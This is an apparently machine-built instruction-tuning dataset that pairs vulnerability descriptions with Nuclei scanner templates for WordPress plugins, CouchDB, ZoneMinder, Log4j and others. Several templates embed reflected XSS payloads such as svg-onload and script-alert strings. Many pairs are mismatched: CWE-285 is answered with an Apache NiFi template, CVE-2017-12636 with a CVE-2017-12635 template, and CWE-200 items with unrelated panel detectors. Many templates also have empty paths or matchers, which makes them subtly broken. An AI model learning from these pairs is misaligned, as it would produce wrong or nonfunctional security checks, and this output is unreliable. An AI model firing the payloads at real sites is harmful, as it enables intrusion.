Homepage Detection. Tags: tech, wordpress, wp-plugin\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: wordpress-all-404-redirect-to-homepage\n\ninfo:\n name: All 404 Redirect to Homepage Detection\n author: ricardomaia\n severity: info\n description: All 404 Redirect to Homepage Detection\n tags: tech,wordpress,wp-plugin,top-200,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/all-404-redirect-to-homepage/readme.txt\" \n matchers:\n - type: dsl\n - type: regex\n part: body", "category": "generic", "severity": "info", "id": "wordpress-all-404-redirect-to-homepage"} +{"instruction": "Generate a Nuclei template for CVE-2022-43017", "input": "Title: Cross-Site Scripting (XSS) in opencats opencats\nSummary: OpenCATS v0.9.6 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the indexFile component.\nVulnerability Type: Cross-Site Scripting (XSS)\nSeverity: medium\nAffected Products: opencats opencats\nIndicators: error, vulnerability detected", "output": "id: CVE-2022-43017\n\ninfo:\n name: OpenCATS 0.9.6 - Cross-Site Scripting\n author: arafatansari\n severity: medium\n description: OpenCATS 0.9.6 contains a cross-site scripting vulnerability via the indexFile component. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n tags: cve,cve2022,xss,opencats,authenticated,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"\" \n - \"CATS=\" \n part: body\n condition: and\n - type: word\n words:\n - \"text/html\" \n part: header\n - type: status\n status:\n - 200", "category": "cve", "severity": "medium", "id": "CVE-2022-43017"} +{"instruction": "Generate a Nuclei template for CVE-2024-43360", "input": "Title: SQL Injection in zoneminder zoneminder\nSummary: ZoneMinder is a free, open source closed-circuit television software application. ZoneMinder is affected by a time-based SQL Injection vulnerability. This vulnerability is fixed in 1.36.34 and 1.37.61.\nVulnerability Type: SQL Injection\nSeverity: critical\nAffected Products: zoneminder zoneminder\nIndicators: error, vulnerability detected", "output": "id: CVE-2024-43360\n\ninfo:\n name: ZoneMinder - SQL Injection\n author: s4e-io\n severity: critical\n description: ZoneMinder is a free, open source closed-circuit television software application. ZoneMinder is affected by a time-based SQL Injection vulnerability. This vulnerability is fixed in 1.36.34 and 1.37.61.\n tags: cve,cve2024,zoneminder,sqli,vkev,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and", "category": "cve", "severity": "critical", "id": "CVE-2024-43360"} +{"instruction": "Generate a Nuclei template for: mosparo Exposed Installation", "input": "Title: mosparo Exposed Installation\nSummary: mosparo Exposed Installation. mosparo is susceptible to the Installation page exposure due to misconfiguration.\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: mosparo-install\n\ninfo:\n name: mosparo Exposed Installation\n author: DhiyaneshDK\n severity: high\n description: mosparo is susceptible to the Installation page exposure due to misconfiguration.\n tags: misconfig,mosparo,install,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/setup/\" \n matchers:\n - type: word\n words:\n - \"Setup - mosparo\" \n - type: status\n status:\n - 200", "category": "generic", "severity": "high", "id": "mosparo-install"} +{"instruction": "Generate a Nuclei template for: Madness DDOS Malware - Detect", "input": "Title: Madness DDOS Malware - Detect\nSummary: Madness DDOS Malware - Detect. Tags: malware, file\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: madness-malware\n\ninfo:\n name: Madness DDOS Malware - Detect\n author: daffainfo\n severity: info\n description: Madness DDOS Malware - Detect\n tags: malware,file\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "madness-malware"} +{"instruction": "Generate a Nuclei template to detect Improper Authorization", "input": "Title: Improper Authorization (CWE-285)\nSummary: The product does not perform or incorrectly performs an authorization check when an actor attempts to access a resource or perform an action. Assuming a user with a given identity, authorization is the process of determining whether that user can access a given resource, based on the user's privileges and any permissions or other access-control specifications that apply to the resource. \n When access control checks are not applied consistently - or not at all - users are able to acce\nVulnerability Type: Improper Authorization\nSeverity: medium\nIndicators: vulnerability detected, error", "output": "id: apache-nifi-unauth\n\ninfo:\n name: Apache NiFi - Unauthenticated Access\n author: pwnhxl\n severity: high\n description: Apache NiFi server was able to be accessed because no authentication was required.\n tags: misconfig,apache,nifi,unauth,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/nifi-api/access/config\" \n matchers:\n - type: word\n words:\n - \"\"supportsLogin\":false}\" \n part: body\n - type: word\n words:\n - \"application/json\" \n part: header\n - type: status\n status:\n - 200", "category": "cwe", "severity": "medium", "id": "CWE-285"} +{"instruction": "Generate a Nuclei template for: Phoenix Contact CHARX SEC-3XXX AC Charging Controller REST API - Detect", "input": "Title: Phoenix Contact CHARX SEC-3XXX AC Charging Controller REST API - Detect\nSummary: Phoenix Contact CHARX SEC-3XXX AC Charging Controller REST API - Detect. Phoenix Contact CHARX SEC-3XXX AC Charging Controller REST API was detected.\n\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: phoenix-contact-charx-api\n\ninfo:\n name: Phoenix Contact CHARX SEC-3XXX AC Charging Controller REST API - Detect\n author: inokii\n severity: info\n description: Phoenix Contact CHARX SEC-3XXX AC Charging Controller REST API was detected.\n tags: phoenix-contact,charx,ics,api,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/api/v1.0/web/retained-data\" \n matchers:\n - type: dsl\n condition: and", "category": "generic", "severity": "info", "id": "phoenix-contact-charx-api"} +{"instruction": "Generate a Nuclei template for CVE-2021-3287", "input": "Title: Deserialization of Untrusted Data in zohocorp manageengine_opmanager\nSummary: Zoho ManageEngine OpManager before 12.5.329 allows unauthenticated Remote Code Execution due to a general bypass in the deserialization class.\nVulnerability Type: Deserialization of Untrusted Data\nSeverity: critical\nAffected Products: zohocorp manageengine_opmanager\nIndicators: error, vulnerability detected", "output": "id: CVE-2021-3287\n\ninfo:\n name: Zoho ManageEngine OpManager < 12.5.329 - Remote Code Execution\n author: theamanrawat\n severity: critical\n description: Zoho ManageEngine OpManager before 12.5.329 contains a remote code execution caused by a general bypass in the deserialization class, letting unauthenticated attackers execute arbitrary code, exploit requires no authentication\n tags: cve,cve2021,deserialization,rce,opmanager,passive,vkev\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: dsl\n condition: and", "category": "cve", "severity": "critical", "id": "CVE-2021-3287"} +{"instruction": "Generate a Nuclei template for CVE-2017-12636", "input": "Title: OS Command Injection in apache couchdb\nSummary: CouchDB administrative users can configure the database server via HTTP(S). Some of the configuration options include paths for operating system-level binaries that are subsequently launched by CouchDB. This allows an admin user in Apache CouchDB before 1.7.0 and 2.x before 2.1.1 to execute arbitrary shell commands as the CouchDB user, including downloading and executing scripts from the public internet.\nVulnerability Type: OS Command Injection\nSeverity: high\nAffected Products: apache couchdb\nIndicators: error, vulnerability detected", "output": "id: CVE-2017-12635\n\ninfo:\n name: Apache CouchDB 1.7.0 / 2.x < 2.1.1 - Remote Privilege Escalation\n author: pikpikcu\n severity: critical\n description: Due to differences in the Erlang-based JSON parser and JavaScript-based JSON parser, it is possible in Apache CouchDB before 1.7.0 and 2.x before 2.1.1 to submit _users documents with duplicate keysfor 'roles' used for access control within the database, including the special case '_admin' role, that denotes administrative users. In combination with CVE-2017-12636 (Remote Code Execution), this can be used to give non-admin users access to arbitrary shell commands on the server as the database system user. The JSON parser differences result in behavior that if two 'roles' keys are available in the JSON, the second one will be used for authorizing the document write, but the first 'roles' key is used for subsequent authorization for the newly created user. By design, users can not assign themselves roles. The vulnerability allows non-admin users to give themselves admin privileges.\n tags: cve2017,cve,couchdb,apache,intrusive,vkev,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"application/json\" \n - \"Location:\" \n part: header\n - type: word\n words:\n - \"org.couchdb.user:poc\" \n - \"conflict\" \n - \"Document update conflict\" \n part: body\n - type: status\n status:\n - 201", "category": "cve", "severity": "high", "id": "CVE-2017-12636"} +{"instruction": "Generate a Nuclei template for: Python Scanner", "input": "Title: Python Scanner\nSummary: Python Scanner. Indicators for dangerous Python functions\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: python-scanner\n\ninfo:\n name: Python Scanner\n author: majidmc2\n severity: info\n description: Indicators for dangerous Python functions\n tags: python,file,sast\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "python-scanner"} +{"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: zabbix-error\n\ninfo:\n name: Zabbix Panel - Detect\n author: dhiyaneshDK\n severity: info\n description: Zabbix panel was detected.\n tags: zabbix,misconfig,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: word\n words:\n - \"<title>Warning [refreshed every 30 sec.]\" \n - type: status\n status:\n - 200", "category": "cwe", "severity": "medium", "id": "CWE-200"} +{"instruction": "Generate a Nuclei template for CVE-2020-29395", "input": "Title: Cross-Site Scripting (XSS) in myeventon eventon\nSummary: The EventON plugin through 3.0.5 for WordPress allows addons/?q= XSS via the search field.\nVulnerability Type: Cross-Site Scripting (XSS)\nSeverity: medium\nAffected Products: myeventon eventon\nIndicators: error, vulnerability detected", "output": "id: CVE-2020-29395\n\ninfo:\n name: Wordpress EventON Calendar 3.0.5 - Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: Wordpress EventON Calendar 3.0.5 is vulnerable to cross-site scripting because it allows addons/?q= XSS via the search field.\n tags: cve,cve2020,wordpress,xss,wp-plugin,packetstorm,myeventon,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"/wp-content/plugins/eventON/\" \n - method: GET\n path:\n - \"{{BaseURL}}/addons/?q=%3Csvg%2Fonload%3Dalert(1)%3E\" \n matchers:\n - type: word\n words:\n - \"\" \n part: body\n - type: word\n words:\n - \"text/html\" \n part: header\n - type: status\n status:\n - 200", "category": "cve", "severity": "medium", "id": "CVE-2020-29395"} +{"instruction": "Generate a Nuclei template for: Flowise Installation Wizard - Exposure", "input": "Title: Flowise Installation Wizard - Exposure\nSummary: Flowise Installation Wizard - Exposure. Flowise Installation Wizard is susceptible to the Installation page exposure due to misconfiguration\n\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: flowise-installer\n\ninfo:\n name: Flowise Installation Wizard - Exposure\n author: pussycat0x\n severity: high\n description: Flowise Installation Wizard is susceptible to the Installation page exposure due to misconfiguration\n tags: misconfig,exposure,install,flowise,intrusive,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/organization-setup\" \n matchers:\n - type: dsl\n condition: and\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and", "category": "generic", "severity": "high", "id": "flowise-installer"} +{"instruction": "Generate a Nuclei template for: Wildcard ACM Certificate Usage", "input": "Title: Wildcard ACM Certificate Usage\nSummary: Wildcard ACM Certificate Usage. Ensure ACM certificates for specific domain names are used over wildcard certificates to adhere to best security practices, providing unique private keys for each domain/subdomain.\n\nVulnerability Type: Security Check\nSeverity: low\nIndicators: vulnerability detected", "output": "id: acm-wildcard-cert\n\ninfo:\n name: Wildcard ACM Certificate Usage\n author: princechaddha\n severity: low\n description: Ensure ACM certificates for specific domain names are used over wildcard certificates to adhere to best security practices, providing unique private keys for each domain/subdomain.\n tags: cloud,devops,aws,amazon,acm,aws-cloud-config\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "low", "id": "acm-wildcard-cert"} +{"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: aethra-panel\n\ninfo:\n name: Aethra Telecommunications Login - Panel\n author: Splint3r7\n severity: info\n description: Aethra Telecommunication login Panel was detected.\n tags: panel,aethra,login,detect,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: dsl\n condition: and", "category": "cwe", "severity": "medium", "id": "CWE-200"} +{"instruction": "Generate a Nuclei template for CVE-2021-44228", "input": "Title: Vulnerability (CWE-20) in siemens 6bk1602-0aa12-0tp0_firmware and others\nSummary: Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects.\nVulnerability Type: Vulnerability (CWE-20)\nSeverity: critical\nAffected Products: siemens 6bk1602-0aa12-0tp0_firmware, siemens 6bk1602-0aa22-0tp0_firmware, siemens 6bk1602-0aa32-0tp0_firmware\nIndicators: error, vulnerability detected", "output": "id: apache-solr-log4j-rce\n\ninfo:\n name: Apache Solr 7+ - Remote Code Execution (Apache Log4j)\n author: Evan Rubinstein,nvn1729,j4vaovo\n severity: critical\n description: Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. This vulnerability affects Solr 7+.\n tags: vulhub,cve,solr,oast,log4j,cve2021,rce,apache,jndi,kev,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"org.apache.solr\" \n part: body\n - type: word\n words:\n - \"dns\" \n part: interactsh_protocol\n - type: regex\n part: interactsh_request", "category": "cve", "severity": "critical", "id": "CVE-2021-44228"} +{"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: secnet-ac-panel\n\ninfo:\n name: SecNet Login Panel - Detect\n author: ritikchaddha\n severity: info\n description: SecNet login panel was detected.\n tags: secnet-ac,panel,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/login.html\" \n matchers:\n - type: word\n words:\n - \"\u5b89\u7f51\u79d1\u6280-\u667a\u80fd\u8def\u7531\u7cfb\u7edf\" \n part: body\n - type: status\n status:\n - 200", "category": "cwe", "severity": "medium", "id": "CWE-200"} +{"instruction": "Generate a Nuclei template for: MiniDionis VBS Dropped File Hash - Detect", "input": "Title: MiniDionis VBS Dropped File Hash - Detect\nSummary: MiniDionis VBS Dropped File Hash - Detect. Detect Dropped File - 1.vbs\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: minidionis-vbs-malware-hash\n\ninfo:\n name: MiniDionis VBS Dropped File Hash - Detect\n author: pussycat0x\n severity: info\n description: Detect Dropped File - 1.vbs\n tags: malware,minidionis\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "minidionis-vbs-malware-hash"} +{"instruction": "Generate a Nuclei template for: EVlink Local Controller - Detection", "input": "Title: EVlink Local Controller - Detection\nSummary: EVlink Local Controller - Detection. Tags: panel, evlink, login\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: evlink-panel\n\ninfo:\n name: EVlink Local Controller - Detection\n author: ritikchaddha\n severity: info\n description: EVlink Local Controller - Detection\n tags: panel,evlink,login,detect,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: word\n words:\n - \"EVlink Local Controller\" \n part: body\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "evlink-panel"} +{"instruction": "Generate a Nuclei template to detect Path Traversal", "input": "Title: Path Traversal (CWE-22)\nSummary: The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory. Many file operations are intended to take place within a restricted directory. By using special elements such as \"..\" and \"/\" separators, attackers can escap\nVulnerability Type: Path Traversal\nSeverity: high\nIndicators: unexpected", "output": "id: hjtcloud-arbitrary-file-read\n\ninfo:\n name: HJTcloud - Local File Inclusion\n author: pikpikcu\n severity: high\n description: HJTcloud is vulnerable to local file inclusion.\n tags: hjtcloud,lfi,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: regex\n condition: or\n - type: status\n status:\n - 200", "category": "cwe", "severity": "high", "id": "CWE-22"} +{"instruction": "Generate a Nuclei template for: ErenSoft - SQL Injection", "input": "Title: ErenSoft - SQL Injection\nSummary: ErenSoft - SQL Injection. SQL Injection is a type of SQL injection attack in which an attacker can exploit a vulnerability in a web application's input fields to manipulate the application's SQL queries.\n\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: erensoft-sqli\n\ninfo:\n name: ErenSoft - SQL Injection\n author: r3Y3r53\n severity: high\n description: SQL Injection is a type of SQL injection attack in which an attacker can exploit a vulnerability in a web application's input fields to manipulate the application's SQL queries.\n tags: sqli,unauth,erensoft,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and\n - type: word\n words:\n - \"class=\"entry-title\"\"", "category": "generic", "severity": "high", "id": "erensoft-sqli"} +{"instruction": "Generate a Nuclei template for CVE-2021-24364", "input": "Title: Cross-Site Scripting (XSS) in tielabs jannah\nSummary: The Jannah WordPress theme before 5.4.4 did not properly sanitize the options JSON parameter in its tie_get_user_weather AJAX action before outputting it back in the page, leading to a Reflected Cross-Site Scripting (XSS) vulnerability.\nVulnerability Type: Cross-Site Scripting (XSS)\nSeverity: medium\nAffected Products: tielabs jannah\nIndicators: error, vulnerability detected", "output": "id: CVE-2021-24364\n\ninfo:\n name: WordPress Jannah Theme <5.4.4 - Cross-Site Scripting\n author: pikpikcu\n severity: medium\n description: WordPress Jannah theme before 5.4.4 contains a reflected cross-site scripting vulnerability. It does not properly sanitize the options JSON parameter in its tie_get_user_weather AJAX action before outputting it back in the page.\n tags: cve2021,cve,wordpress,xss,wp-theme,wpscan,tielabs,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"/wp-content/themes/jannah/assets/\" \n - \"attachment-jannah-image-\" \n condition: or\n - method: GET\n path:\n - \"{{BaseURL}}/wp-admin/admin-ajax.php?action=tie_get_user_weather&options=%7B%27location%27%3A%27Cairo%27%2C%27units%27%3A%27C%27%2C%27forecast_days%27%3A%275%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ecustom_name%27%3A%27Cairo%27%2C%27animated%27%3A%27true%27%7D\" \n matchers:\n - type: word\n words:\n - \"\" \n part: body\n - type: word\n words:\n - \"text/html\" \n part: header\n - type: status\n status:\n - 200", "category": "cve", "severity": "medium", "id": "CVE-2021-24364"} +{"instruction": "Generate a Nuclei template for CVE-2023-3846", "input": "Title: Cross-Site Scripting (XSS) in moosocial moodating\nSummary: A vulnerability classified as problematic has been found in mooSocial mooDating 1.2. This affects an unknown part of the file /pages of the component URL Handler. The manipulation leads to cross site scripting. It is possible to initiate the attack remotely. The identifier VDB-235197 was assigned to this vulnerability. NOTE: We tried to contact the vendor early about the disclosure but the official mail address was not working properly.\nVulnerability Type: Cross-Site Scripting (XSS)\nSeverity: low\nAffected Products: moosocial moodating\nIndicators: error, vulnerability detected", "output": "id: CVE-2023-3846\n\ninfo:\n name: MooDating 1.2 - Cross-Site Scripting\n author: r3Y3r53\n severity: medium\n description: A vulnerability classified as problematic has been found in mooSocial mooDating 1.2. This affects an unknown part of the file /pages of the component URL Handler. The manipulation leads to cross site scripting. It is possible to initiate the attack remotely.\n tags: cve2023,cve,packetstorm,xss,moodating,moosocial,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/pagesi3efi%22%3e%3cimg%20src%3da%20onerror%3dalert(document.domain)%3ebdk84/no-permission-role?access_token&=redirect_url=aHR0cHM6Ly9kZW1vLm1vb2RhdGluZ3NjcmlwdC5jb20vbWVldF9tZS9pbmRleC9tZWV0X21l\" \n matchers:\n - type: dsl\n condition: and", "category": "cve", "severity": "low", "id": "CVE-2023-3846"} +{"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: wuzhicms-detect\n\ninfo:\n name: Wuzhicms Detected\n author: pikpikcu\n severity: info\n description: Wuzhicms was detected.\n tags: tech,wuzhicms,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: word\n words:\n - \"Powered by wuzhicms\" \n - \"\u4e94\u6307CMS\" \n part: body\n condition: or\n - type: status\n status:\n - 200", "category": "cwe", "severity": "medium", "id": "CWE-200"} +{"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: seneporno\n\ninfo:\n name: Seneporno User Name Information - Detect\n author: dwisiswant0\n severity: info\n description: Seneporno user name information check was conducted.\n tags: osint,osint-porn,seneporno,discovery\n\nhttp:\n - method: GET\n path:\n - \"https://seneporno.com/user/{{user}}\" \n matchers:\n - type: status\n status:\n - 200\n - type: word\n words:\n - \"Dernier Login\" \n part: body", "category": "cwe", "severity": "medium", "id": "CWE-200"} +{"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: trakt\n\ninfo:\n name: Trakt User Name Information - Detect\n author: dwisiswant0\n severity: info\n description: Trakt user name information check was conducted.\n tags: osint,osint-video,trakt,discovery\n\nhttp:\n - method: GET\n path:\n - \"https://trakt.tv/users/{{user}}\" \n matchers:\n - type: status\n status:\n - 200\n - type: word\n words:\n - \"s profile - Trakt\" \n part: body", "category": "cwe", "severity": "medium", "id": "CWE-200"} +{"instruction": "Generate a Nuclei template for: Macshell C2 JARM - Detect", "input": "Title: Macshell C2 JARM - Detect\nSummary: Macshell C2 JARM - Detect. MacShellSwift is a proof of concept MacOS post-exploitation tool written in Swift using encrypted sockets. This tool has been tested both pre and post-Catalina. I rewrote a prior tool of mine MacShell (one of my repos) and changed the client to Swift instead of python. This tool consists of two parts: a server script and a client binary. I wrote this tool to help blue teamers proactively guage detections against macOS post-exploitation methods that use macOS internal c\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: macshell-c2-jarm\n\ninfo:\n name: Macshell C2 JARM - Detect\n author: pussycat0x\n severity: info\n description: MacShellSwift is a proof of concept MacOS post-exploitation tool written in Swift using encrypted sockets. This tool has been tested both pre and post-Catalina. I rewrote a prior tool of mine MacShell (one of my repos) and changed the client to Swift instead of python. This tool consists of two parts: a server script and a client binary. I wrote this tool to help blue teamers proactively guage detections against macOS post-exploitation methods that use macOS internal calls. Red teams can also find this of use for getting ideas around using Swift for macOS post-exploitation\n tags: jarm,network,c2,ir,osint,cti,macshell,tcp,vuln\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "macshell-c2-jarm"} +{"instruction": "Generate a Nuclei template for CVE-2024-2771", "input": "Title: Missing Authorization in fluentforms contact_form\nSummary: The Contact Form Plugin by Fluent Forms for Quiz, Survey, and Drag & Drop WP Form Builder plugin for WordPress is vulnerable to privilege escalation due to a missing capability check on the /wp-json/fluentform/v1/managers REST API endpoint in all versions up to, and including, 5.1.16. This makes it possible for unauthenticated attackers to grant users with Fluent Form management permissions which gives them access to all of the plugin's settings and features. This also makes it possible for unauthenticated attackers to delete manager accounts.\nVulnerability Type: Missing Authorization\nSeverity: critical\nAffected Products: fluentforms contact_form\nIndicators: error, vulnerability detected", "output": "id: CVE-2024-2771\n\ninfo:\n name: Contact Form Plugin by Fluent Forms < 5.1.17 - Unauthenticated Limited Privilege Escalation\n author: Sourabh-Sahu\n severity: critical\n description: The plugin is vulnerable to privilege escalation due to a missing capability check on the /wp-json/fluentform/v1/managers REST API endpoint. This makes it possible for unauthenticated attackers to grant users with Fluent Form management permissions which gives them access to all of the plugin's settings and features. This also makes it possible for unauthenticated attackers to delete manager accounts.\n tags: cve,cve2024,wordpress,fluentforms,wp-plugin,unauth,wp,vkev,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and", "category": "cve", "severity": "critical", "id": "CVE-2024-2771"} +{"instruction": "Generate a Nuclei template for CVE-2022-1329", "input": "Title: Unrestricted File Upload in elementor website_builder\nSummary: The Elementor Website Builder plugin for WordPress is vulnerable to unauthorized execution of several AJAX actions due to a missing capability check in the ~/core/app/modules/onboarding/module.php file that make it possible for attackers to modify site data in addition to uploading malicious files that can be used to obtain remote code execution, in versions 3.6.0 to 3.6.2.\nVulnerability Type: Unrestricted File Upload\nSeverity: high\nAffected Products: elementor website_builder\nIndicators: unauthorized", "output": "id: CVE-2022-1329\n\ninfo:\n name: Elementor Website Builder - Remote Code Execution\n author: theamanrawat\n severity: high\n description: The Elementor Website Builder plugin for WordPress versions 3.6.0 to 3.6.2 are vulnerable to unauthorized execution of several AJAX actions due to a missing capability check in the ~/core/app/modules/onboarding/module.php file. This makes it possible for attackers to modify site data and upload malicious files which can be used to obtain remote code execution.\n tags: cve2022,cve,rce,wordpress,wp-plugin,wp,elementor,authenticated,intrusive,fileupload,vkev,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"5f9bc5edd71c78284dabe630df8cd71d\" \n part: body_4", "category": "cve", "severity": "high", "id": "CVE-2022-1329"} +{"instruction": "Generate a Nuclei template for: Strapi CMS detect", "input": "Title: Strapi CMS detect\nSummary: Strapi CMS detect. Open source Node.js Headless CMS to easily build customisable APIs\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: strapi-cms-detect\n\ninfo:\n name: Strapi CMS detect\n author: cyllective,daffainfo,idealphase\n severity: info\n description: Open source Node.js Headless CMS to easily build customisable APIs\n tags: tech,strapi,cms,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/admin/init\" \n matchers:\n - type: word\n words:\n - \"\"data\"\" \n - \"\"uuid\"\" \n - \"\"hasAdmin\"\" \n part: body\n condition: and\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "strapi-cms-detect"} +{"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: netsparker-panel\n\ninfo:\n name: Netsparker Login Panel - Detect\n author: pussycat0x\n severity: info\n description: Netsparker login panel was detected.\n tags: 